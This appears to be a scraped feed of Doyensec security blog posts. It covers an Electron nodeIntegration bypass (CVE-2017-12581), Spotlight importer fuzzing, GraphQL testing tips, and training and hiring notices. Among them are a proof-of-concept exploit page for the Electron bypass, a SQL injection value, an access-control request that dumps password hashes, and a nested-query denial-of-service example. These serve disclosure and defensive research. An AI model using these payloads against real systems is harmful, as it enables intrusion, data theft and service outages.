🔒
There are new articles available, click to refresh the page.
Before yesterdayDoyensec's Blog

Developing Burp Suite Extensions training

1 March 2017 at 23:00
div class=message We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the 8-hours workshop. /div h3 id=titleTitle/h3 pDeveloping Burp Suite Extensions - From manual testing to security automation./p h3 id=overviewOverview/h3 pEnsuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions./p pBased on this premise, we have created a brand-new class taking advantage of a href=https://portswigger.net/burp/Burp Suite/a - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits./p pAfter a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle’s Netbeans, we also provide templates for IntelliJ IDEA and Eclipse./p pWe will create many different types of plugins:/p ul liemExtension #1/em: A custom logger to provide persistency and data export functionalities/li liemExtension #2/em: A simple (and yet useful) replay tool/li liemExtension #3/em: Active check for Burp’s scanning engine/li liemExtension #4/em: Passive check for Burp’s scanning engine/li /ul pFinally, we leverage our extensions to build a security automation toolchain integrated in a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncovering nasty security vulnerabilities./p pAll templates and code-complete Burp Suite extensions will be available for free on a href=https://github.com/doyensec/burpdeveltrainingDoyensec’s Github/a. If you are curious, we’ve already uploaded the first three modules./p h3 id=audienceAudience/h3 pThe training is suitable for both web application security specialists and developers. Attendees are expected to have rudimental understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java)./p h3 id=requirementsRequirements/h3 pAttendees should bring their own laptop with the latest Java as well as their favourite IDE installed./p h3 id=upcoming-datesUpcoming dates/h3 table thead tr thLocation/th thDate/th thNotes/th /tr /thead tbody tr tdHeidelbergbr /(Germany)/td tdMarch 21, 2017/td tdDelivered during a href=https://www.troopers.de/events/troopers17/720_developing_burp_suite_extensions_-_from_manual_testing_to_security_automation/Troopers 2017 security conference/a. There are still seats available. bBook it today and get Burp swag during the training!/b/td /tr tr tdWarsawbr /(Poland)/td tdJune 5, 2017/td tdCome for a href=http://warcon.pl/WarCon invite-only conference/a, stay for the training!br /For registration, please contact a href=mailto:[email protected]@doyensec.com/a with subject line Burp Training Post-WarCon./td /tr /tbody /table h3 id=private-trainingPrivate training/h3 pThis training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording available on request./p pFeel free to contact us at a href=mailto:[email protected]@doyensec.com/a for scheduling your class!/p

Modern Alchemy: Turning XSS into RCE

2 August 2017 at 22:00
h3 id=tldrTL;DR/h3 pAt the recent a href=https://www.blackhat.com/us-17/briefings.html#electronegativity-a-study-of-electron-securityBlack Hat Briefings 2017/a, Doyensec’s co-founder a href=https://twitter.com/lucacarettoniLuca Carettoni/a presented a new research on a href=https://electron.atom.ioElectron/a security. After a quick overview of Electron’s security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise emany/em Electron-based application. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place./p pIn this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations./p h3 id=whats-electronWhat’s Electron?/h3 pWhile you may not recognize the name, it is likely that you’re already using Electron since it’s running on millions of computers. a href=https://electron.atom.io/apps/Slack, Atom, Visual Studio Code, WordPress Desktop, Github Desktop, Basecamp3, Mattermost/a are just few examples of applications built using this framework. Any time that a traditional web application is ported to desktop, it is likely that the developers used Electron./p pimg src=../../../public/images/electron1.png width=550 alt=Electron Motto align=center //p h3 id=understanding-the-nodeintegration-flagUnderstanding the emnodeIntegration/em flag/h3 pWhile Electron is based on Chromium’s Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms./p pa href=https://electron.atom.io/docs/tutorial/security/It is well understood/a that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to “sandbox” untrusted resources:/p pemBrowserWindow/em/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nxmainWindow/span span class=o=/span span class=knew/span span class=nxBrowserWindow/spanspan class=p({/span span class=dl/spanspan class=s2webPreferences/spanspan class=dl/spanspan class=p:/span span class=p{/span span class=dl/spanspan class=s2nodeIntegration/spanspan class=dl/span span class=p:/span span class=kcfalse/spanspan class=p,/span span class=dl/spanspan class=s2nodeIntegrationInWorker/spanspan class=dl/span span class=p:/span span class=kcfalse/span span class=p}/span span class=p});/span span class=nxmainWindow/spanspan class=p./spanspan class=nxloadURL/spanspan class=p(/spanspan class=dl'/spanspan class=s1https://www.doyensec.com//spanspan class=dl'/spanspan class=p);/span /code/pre/div/div pemWebView/em/p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=ntlt;webview/span span class=nasrc=/spanspan class=shttps://www.doyensec.com//spanspan class=ntgt;lt;/webviewgt;/span /code/pre/div/div pIn above examples, the strongnodeIntegration/strong flag is set to false. JavaScript running in the page won’t have access to global references despite having a Node.js engine running in the renderer process./p h3 id=hunting-for-nodeintegration-bypassesHunting for emnodeIntegration/em bypasses/h3 pIt should now be clear why emnodeIntegration/em is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaws to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem./p pDuring our research, we have extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron’s design and weaknesses. Armed with that knowledge, we went for a hunt./p pBy studying the a href=https://electron.atom.io/docs/all/official documentation/a, we quickly identified a significant deviation from standard browsers caused by Electron’s “glorified” JavaScript APIs./p pWhen a new window is created, Electron returns an instance of a href=https://electron.atom.io/docs/all/#class-browserwindowproxyBrowserWindowProxy/a. This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP)./p pemSOP Bypass #1/em/p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=ntlt;scriptgt;/span span class=kdconst/span span class=nxwin/span span class=o=/span span class=nbwindow/spanspan class=p./spanspan class=nxopen/spanspan class=p(/spanspan class=dl/spanspan class=s2https://www.doyensec.com/spanspan class=dl/spanspan class=p);/span span class=nxwin/spanspan class=p./spanspan class=nxlocation/span span class=o=/span span class=dl/spanspan class=s2javascript:alert(document.domain)/spanspan class=dl/spanspan class=p;/span span class=ntlt;/scriptgt;/span /code/pre/div/div pemSOP Bypass #2/em/p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=ntlt;scriptgt;/span span class=kdconst/span span class=nxwin/span span class=o=/span span class=nbwindow/spanspan class=p./spanspan class=nxopen/spanspan class=p(/spanspan class=dl/spanspan class=s2https://www.doyensec.com/spanspan class=dl/spanspan class=p);/span span class=nxwin/spanspan class=p./spanspan class=nbeval/spanspan class=p(/spanspan class=dl/spanspan class=s2alert(document.domain)/spanspan class=dl/spanspan class=p);/span span class=ntlt;/scriptgt;/span /code/pre/div/div pThe emeval/em mechanism used by the SOP Bypass #2 can be explained with the following diagram:/p pimg src=../../../public/images/electron2.png width=550 alt=BrowserWindowProxy's Eval align=center //p pAdditional source code review revealed the presence of privileged URLs (similar to browsers’ privileged zones). Combining the SOP-bypass by design with a specific privileged url defined in emlib/renderer/init.js/em, we realized that we could override the nodeIntegration setting./p pimg src=../../../public/images/electron3.png alt=Chrome DevTools in Electron, prior to 1.6.8 title=Chrome DevTools in Electron, prior to 1.6.8 //p pA simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is hereby included:/p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodelt;!DOCTYPE htmlgt; lt;htmlgt; lt;headgt; lt;titlegt;nodeIntegration bypass (SOP2RCE)lt;/titlegt; lt;/headgt; lt;bodygt; lt;scriptgt; document.write(Current location: + window.location.href + lt;brgt;); const win = window.open(chrome-devtools://devtools/bundled/inspector.html); win.eval(const {shell} = require('electron'); shell.openExternal('file:///Applications/Calculator.app');); lt;/scriptgt; lt;/bodygt; lt;/htmlgt; /code/pre/div/div pOn May 10, 2017 we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix since the privileged emchrome-devtools:///em was discovered during an internal security activity just few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the a href=https://github.com/electron/electron/commit/05b6d91bf4c1e0ee65eeef70cd5d1bd1df125644git commit/a that fixes the privileged url is dated April 24, 2017./p pThe issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron and consequently all Electron-based apps were affected. Mitre assigned CVE-2017-12581 for this issue./p h3 id=mitigating-nodeintegration-bypass-vulnerabilitiesMitigating nodeIntegration bypass vulnerabilities/h3 ul li pstrongKeep your application in sync with the latest Electron framework release./strong When releasing your product, you’re also shipping a bundle composed of Electron, Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application./p /li li pstrongAdopt secure coding practices./strong The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron hence it is highly recommend to adopt secure software development best practices and perform periodic security testing./p /li li pstrongKnow your framework (and its limitations)./strong Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense in depth mechanisms to mitigate those deficiencies. For more details, please refer to our a href=https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdfElectronegativity, A study of Electron Security/a presentation and a href=https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdfElectron Security Checklist/a white-paper./p /li li pstrongUse the recent “sandbox” experimental feature./strong Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable a href=https://electron.atom.io/docs/api/sandbox-option/sandboxing/a which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderers can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the code class=language-plaintext highlighter-rougelt;webviewgt;/code tag, etc.) this option should be enabled to provide additional isolation./p /li /ul

Staring into the Spotlight

14 November 2017 at 23:00
pSpotlight is the all pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents interesting attack surface and this blog post is an explanation of how some of it works./p pOne day, we found some interesting looking crashes recorded in code class=language-plaintext highlighter-rouge/Users/lt;namegt;/Library/Logs/DiagnosticReports/code/p pYet the crashes weren’t from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later./p h3 id=fseventsfsevents/h3 pThe Spotlight system is overseen by mds. It opens and reads from code class=language-plaintext highlighter-rouge/dev/fsevents/code, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work and managing mdworker processes with whom it communicates through mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block and the volume of events streaming through the fsevents device can be quite a lot. Mds will spawn more mdworker processes when handling a higher event magnitude but there is no guarantee it can see and capture every single event./p pThe kernel filters which root level processes can read from this device. img src=../../../public/images/sl-fsevents_process_names.png alt=fsevents filter align=center //p pEach of the mdworker processes get spawned, parse some files, write the meta info, and die. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we talk about in regards to mdimport also applies to mdworker./p h3 id=importersImporters/h3 pYou can see what mdworkers are up to with the following: code class=language-plaintext highlighter-rougesudo fs_usage -w -f filesys mdworker/code/p pImporters are found in code class=language-plaintext highlighter-rouge/Library/Spotlight/code, code class=language-plaintext highlighter-rouge/System/Library/Spotlight/code, or in an application’s bundle within “/Contents/Library/Spotlight”. If the latter is chosen, the app typically runs a post install script with code class=language-plaintext highlighter-rougemdimport -r lt;importergt;/code and/or lsregister. The following command shows the list of importers present on my laptop. It shows some third party apps have installed their own importers./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcode$ mdimport -L 2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) ( /Library/Spotlight/iBooksAuthor.mdimporter, /Library/Spotlight/iWork.mdimporter, /Library/Spotlight/Microsoft Office.mdimporter, /System/Library/Spotlight/Application.mdimporter, ... /System/Library/Spotlight/SystemPrefs.mdimporter, /System/Library/Spotlight/vCard.mdimporter, /Applications/Xcode.app/Contents/Applications/Application Loader.app/Contents/Library/Spotlight/MZSpotlight.mdimporter, /Applications/LibreOffice.app/Contents/Library/Spotlight/OOoSpotlightImporter.mdimporter, /Applications/OmniGraffle.app/Contents/Library/Spotlight/OmniGraffle.mdimporter, /Applications/GarageBand.app/Contents/Library/Spotlight/LogicX_MDImport.mdimporter, /Applications/Xcode.app/Contents/Library/Spotlight/uuid.mdimporter ) /code/pre/div/div pThese .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking./p pUsing mdimport is simple - code class=language-plaintext highlighter-rougemdimport lt;filegt;/code. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the “/usr/share/file/magic” directory which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed at a href=https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man5/magic.5.htmlthe official Apple developer documentation/a./p h3 id=crash-fileCrash File/h3 pimg src=../../../public/images/sl-Crash_Log.png alt=crash logging align=center //p pOne thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:/p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodeApplication Specific Information: import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 uti:com.apple.truetype-datafork-suitcase-font plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437 /code/pre/div/div pThe 2682437 is the iNode reference number for the file in question on disk. The -t argument to mdutil will ask it to lookup the file based on volume ID and iNode and spit out the string. It performs an open and fcntl on the pseudo directory code class=language-plaintext highlighter-rouge/.vol/lt;Volume IDgt;/lt;File iNodegt;/code. You can see this info with the stat syscall on a file./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcode$ stat /etc 16777220 418395 lrwxr-xr-x 1 root wheel 0 11 Dec 10 05:13:41 2016 Dec 10 05:13:41 2016 Dec 10 05:15:47 2016 Dec 10 05:13:41 2016 4096 8 0x88000 /etc $ ls /.vol/16777220/418395 afpovertcp.cfg fstab.hd networks protocols aliases ftpd.conf newsyslog.conf racoon aliases.db ftpd.conf.default newsyslog.d rc.common /code/pre/div/div pThe UTI registered by the importer is also shown “com.apple.truetype-datafork-suitcase-font”. In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file./p pWhen we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the code class=language-plaintext highlighter-rouge/System/Library/Spotlight/Font.mdimporter/code importer./p pimg src=../../../public/images/sl-crash_in_lldb.png alt=crash logging align=center //p pThe screenshot below shows the problem procedure with the crashing instruction highlighted for this particular bug./p pimg src=../../../public/images/sl-crashing_instruction.png align=center //p pThe rsi register points into the memory mapped font file. A value is read out and stored in rax which is then used as an offset from rcx which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated./p pWhen writing or reversing a Spotlight importer, the main symbol to first look at will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary./p pimg src=../../../public/images/sl-lldb_backtrace.png align=center //p pWe can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward, crashes and signals are easily caught./p pThe variety of importers present on OSX are sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language and makes a great target where more research is needed./p pWhen fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences-gt;Spotlight-gt;Privacy. You can’t fuzz mdimport from this folder, instead disable Spotlight with “mdutil -i off” and run your fuzzer from a different folder./p [email protected]/p

We're hiring - Join Doyensec!

26 November 2017 at 23:00
pAt a href=https://doyensec.com/Doyensec/a, we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security./p pWe are a small highly focused team. We concentrate on application security and do fewer things better. We don’t care about your education, background and certifications. If you are emreally/em good and passionate at building and breaking complex software, you’re the right candidate./p h3 id=open-positionsOpen Positions/h3 h4 id=-full-stack-security-automation-engineer-six-months-collaboration-remote-work-:: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::/h4 pWe are looking for a full-stack senior software engineer that can help us build security automation tools. If you’ve ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job./p pWe offer a well-paid six-months collaboration, combined with an additional bonus upon successful completion of the project./p puResponsibilities:/u/p ul liFull-stack development (front-end, back-end components) of web security testing tools/li liSolve technical challenges at the edge of web security Ramp;D, together with Doyensec’s founders/li /ul puRequirements:/u/p ul liExperience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages/li liAbility to work with standard dev tools and techniques (IDE, git, …)/li liYou’re passionate about building great software and can have fun while doing it/li liInterested in web security, with good understanding of common software vulnerabilities/li liYou’re self-driven and can focus on a project to make it happen/li liEager to learn, adapt and perfect your work/li /ul pContact us at a href=mailto:[email protected]@doyensec.com/a/p h4 id=-application-security-engineer-full-time-remote-work---europe-:: Application Security Engineer (Full-time, Remote Work - Europe) ::/h4 pWe are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you’re good at em“crawling around in the ventilation ducts of the world’s most popular and important applications”/em, you probably have the right skillset for the job./p pWe offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore invest 25% of emyour/em time exclusively to research where we build security testing tools, discover new attack techniques, and develop countermeasures./p puResponsibilities:/u/p ul liSecurity testing of web, mobile (iOS, Android) applications/li liVulnerability research activities, coordinated and executed with Doyensec’s founders/li liPartner with customers to ensure project’s objectives are achieved /li /ul puRequirements:/u/p ul liAbility to discover, document and fix security bugs/li liYou’re passionate about understanding complex systems and can have fun while doing it/li liTop-notch in web security. Show us public research, code, advisories, etc./li liEager to learn, adapt, and perfect your work/li /ul pContact us at a href=mailto:[email protected]@doyensec.com/a/p

GraphQL - Security Overview and Testing Tips

16 May 2018 at 22:00
pWith the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes./p h3 id=what-is-graphqlWhat is GraphQL?/h3 pa href=https://graphql.org/GraphQL/a is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST API./p pEven if you don’t see any GraphQL out there, it is likely you’re already using it since it’s running on some big tech giants like Facebook, GitHub, Pinterest, Twitter, HackerOne and a a href=http://graphql.org/users/lot more/a./p h4 id=a-few-key-points-on-this-technologyA few key points on this technology/h4 ul li pGraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. strongQueries always return predictable results/strong./p /li li pWhile typical REST APIs require loading from multiple URLs, GraphQL APIs get strongall the data/strong your app needs strongin a single request/strong./p /li li pGraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of strongall your data from a single endpoint/strong./p /li li pGraphQL is strongstrongly typed/strong to ensure that application only ask for what’s possible and provide clear and helpful errors./p /li li pstrongNew fields and types can be added/strong to the GraphQL API strongwithout impacting existing queries. Aging fields can be deprecated/strong and hidden from tools./p /li /ul pBefore we start diving into the GraphQL security landscape, here is a brief recap on how it works. The a href=http://graphql.org/learn/official documentation/a is well written and was really helpful./p pA GraphQL query looks like this:/p pemBasic GraphQL Query/em/p div class=language-graphql highlighter-rougediv class=highlightpre class=highlightcodespan class=kquery/spanspan class=p{/spanspan class=w /spanspan class=nuser/spanspan class=p{/spanspan class=w /spanspan class=nid/spanspan class=w /spanspan class=nemail/spanspan class=w /spanspan class=nfirstName/spanspan class=w /spanspan class=nlastName/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pWhile the response is JSON:/p pemBasic GraphQL Response/em/p div class=language-json highlighter-rougediv class=highlightpre class=highlightcodespan class=p{/spanspan class=w /spanspan class=nldata/spanspan class=p:/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nluser/spanspan class=p:/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nlid/spanspan class=p:/spanspan class=w /spanspan class=s21/spanspan class=p,/spanspan class=w /spanspan class=nlemail/spanspan class=p:/spanspan class=w /spanspan [email protected]/spanspan class=p,/spanspan class=w /spanspan class=nlfirstName/spanspan class=p:/spanspan class=w /spanspan class=s2Paolo/spanspan class=p,/spanspan class=w /spanspan class=nllastName/spanspan class=p:/spanspan class=w /spanspan class=s2Stagno/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div h3 id=security-testing-tipsSecurity Testing Tips/h3 pSince a href=https://portswigger.net/Burp Suite/a does not understand GraphQL syntax well, I recommend using the a href=https://github.com/andev-software/graphql-idegraphql-ide/a, an Electron based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small python script a href=https://github.com/doyensec/graph-ql/GraphQL_Introspection.py/a that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema looking for information leakage, hidden data and fields that are not intended to be accessible./p pThe tool will generate a HTML report similar to the following:/p pimg src=../../../public/images/GraphQL_Introspection.png alt=Python Script pulling data from a GraphQL endpoint align=center //p pa href=https://graphql.org/learn/introspection/Introspection/a is used to ask for a GraphQL schema for information about what queries, types and so on it supports./p pAs a pentester, I would recommend to look for requests issued to strong“/graphql”/strong or strong“/graphql.php”/strong since those are usual GraphQL endpoint names; you should also search for strong“/graphiql”/strong, strong”graphql/console/”/strong, online GraphQL IDEs to interact with the backend, and strong“/graphql.php?debug=1”/strong (debugging mode with additional error reporting) since they may be left open by developers./p pWhen testing an application, verify whether requests can be issued without the usual authorization token header:/p pimg src=../../../public/images/GraphQL_AuthToken.png alt=GraphQL Bearer Authorization Header Example align=center //p pSince the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:/p blockquote p“However, for a production codebase, delegate authorization logic to the business logic layer”./p /blockquote pThings may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server./p pWhen building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to strongBroken Access Controls/strong, strongInsecure Direct Object References/strong and even strongSQL/NoSQL Injections/strong./p pAs an example of a broken implementation, the following request/response demonstrates that we can fetch data for any users of the platform (cycling through the ID parameter), while simultaneously dumping password hashes:/p pemQuery/em/p div class=language-graphql highlighter-rougediv class=highlightpre class=highlightcodespan class=kquery/spanspan class=p{/spanspan class=w /spanspan class=nuser/spanspan class=p(/spanspan class=nid/spanspan class=p:/spanspan class=w /spanspan class=mi165274/spanspan class=p){/spanspan class=w /spanspan class=nid/spanspan class=w /spanspan class=nemail/spanspan class=w /spanspan class=nfirstName/spanspan class=w /spanspan class=nlastName/spanspan class=w /spanspan class=npassword/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pemResponse/em/p div class=language-json highlighter-rougediv class=highlightpre class=highlightcodespan class=p{/spanspan class=w /spanspan class=nldata/spanspan class=p:/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nluser/spanspan class=p:/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nlid/spanspan class=p:/spanspan class=w /spanspan class=s2165274/spanspan class=p,/spanspan class=w /spanspan class=nlemail/spanspan class=p:/spanspan class=w /spanspan [email protected]/spanspan class=p,/spanspan class=w /spanspan class=nlfirstName/spanspan class=p:/spanspan class=w /spanspan class=s2John/spanspan class=p,/spanspan class=w /spanspan class=nllastName/spanspan class=p:/spanspan class=w /spanspan class=s2Doe/spanspan class=w /spanspan class=nlpassword/spanspan class=p:/spanspan class=w /spanspan class=s25F4DCC3B5AA765D61D8327DEB882CF99/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pAnother thing that you will have to check is related to information disclosure when trying to perform illegal queries:/p pemInformation Disclosure/em/p div class=language-json highlighter-rougediv class=highlightpre class=highlightcodespan class=p{/spanspan class=w /spanspan class=nlerrors/spanspan class=p:/spanspan class=w /spanspan class=p[/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nlmessage/spanspan class=p:/spanspan class=w /spanspan class=s2Invalid ID./spanspan class=p,/spanspan class=w /spanspan class=nllocations/spanspan class=p:/spanspan class=w /spanspan class=p[/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nlline/spanspan class=p:/spanspan class=w /spanspan class=mi2/spanspan class=p,/spanspan class=w /spanspan class=nlcolumn/spanspan class=p:/spanspan class=w /spanspan class=mi12/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=s2Stack/spanspan class=err:/spanspan class=w /spanspan class=s2Error: invalid ID/spanspan class=se\n/spanspan class=s2 at (/var/www/examples/04-bank/graphql.php)/spanspan class=se\n/spanspan class=s2/spanspan class=w /spanspan class=p]/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p]/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pEven though GraphQL is strongstrongly typed/strong, SQL/NoSQL Injections are still possible since strongGraphQL is just a layer between client apps and the database/strong. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database; variables that are not properly sanitized lead to old simple SQL Injection. In case of Mongodb, NoSQL injection may not be that simple since we cannot “juggle” types (e.g. turning a string into an array. See a href=http://php.net/manual/en/mongo.security.phpPHP MongoDB Injection/a)./p pemGraphQL SQL Injection/em/p div class=language-graphql highlighter-rougediv class=highlightpre class=highlightcodespan class=kmutation/spanspan class=w /spanspan class=nsearch/spanspan class=p(/spanspan class=nv$filters/spanspan class=w /spanspan class=nFilters/spanspan class=p!){/spanspan class=w /spanspan class=nauthors/spanspan class=p(/spanspan class=nfilter/spanspan class=p:/spanspan class=w /spanspan class=nv$filters/spanspan class=p)/spanspan class=w /spanspan class=nviewer/spanspan class=p{/spanspan class=w /spanspan class=nid/spanspan class=w /spanspan class=nemail/spanspan class=w /spanspan class=nfirstName/spanspan class=w /spanspan class=nlastName/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=err/spanspan class=nfilters/spanspan class=err:/spanspan class=p{/spanspan class=w /spanspan class=err/spanspan class=nusername/spanspan class=err:/spanspan class=npaolo/spanspan class=err'/spanspan class=w /spanspan class=nor/spanspan class=w /spanspan class=err1=1--/spanspan class=w /spanspan class=err/spanspan class=nminstories/spanspan class=err:0/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pemBeware of nested queries!/em They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:/p pemNested Query/em/p div class=language-graphql highlighter-rougediv class=highlightpre class=highlightcodespan class=kquery/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nstories/spanspan class=p{/spanspan class=w /spanspan class=ntitle/spanspan class=w /spanspan class=nbody/spanspan class=w /spanspan class=ncomments/spanspan class=p{/spanspan class=w /spanspan class=ncomment/spanspan class=w /spanspan class=nauthor/spanspan class=p{/spanspan class=w /spanspan class=ncomments/spanspan class=p{/spanspan class=w /spanspan class=nauthor/spanspan class=p{/spanspan class=w /spanspan class=ncomments/spanspan class=p{/spanspan class=w /spanspan class=ncomment/spanspan class=w /spanspan class=nauthor/spanspan class=p{/spanspan class=w /spanspan class=ncomments/spanspan class=p{/spanspan class=w /spanspan class=ncomment/spanspan class=w /spanspan class=nauthor/spanspan class=p{/spanspan class=w /spanspan class=ncomments/spanspan class=p{/spanspan class=w /spanspan class=ncomment/spanspan class=w /spanspan class=nauthor/spanspan class=p{/spanspan class=w /spanspan class=nname/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pAn easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value./p pKeep in mind that in the a href=https://github.com/webonyx/graphql-phpPHP GraphQL implementation/a:/p ul li pComplexity analysis is disabled by default/p /li li pLimiting Query Depth is disabled by default/p /li li pIntrospection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing meta fields strongtype/strong and strongschema/strong/p /li /ul h3 id=outroOutro/h3 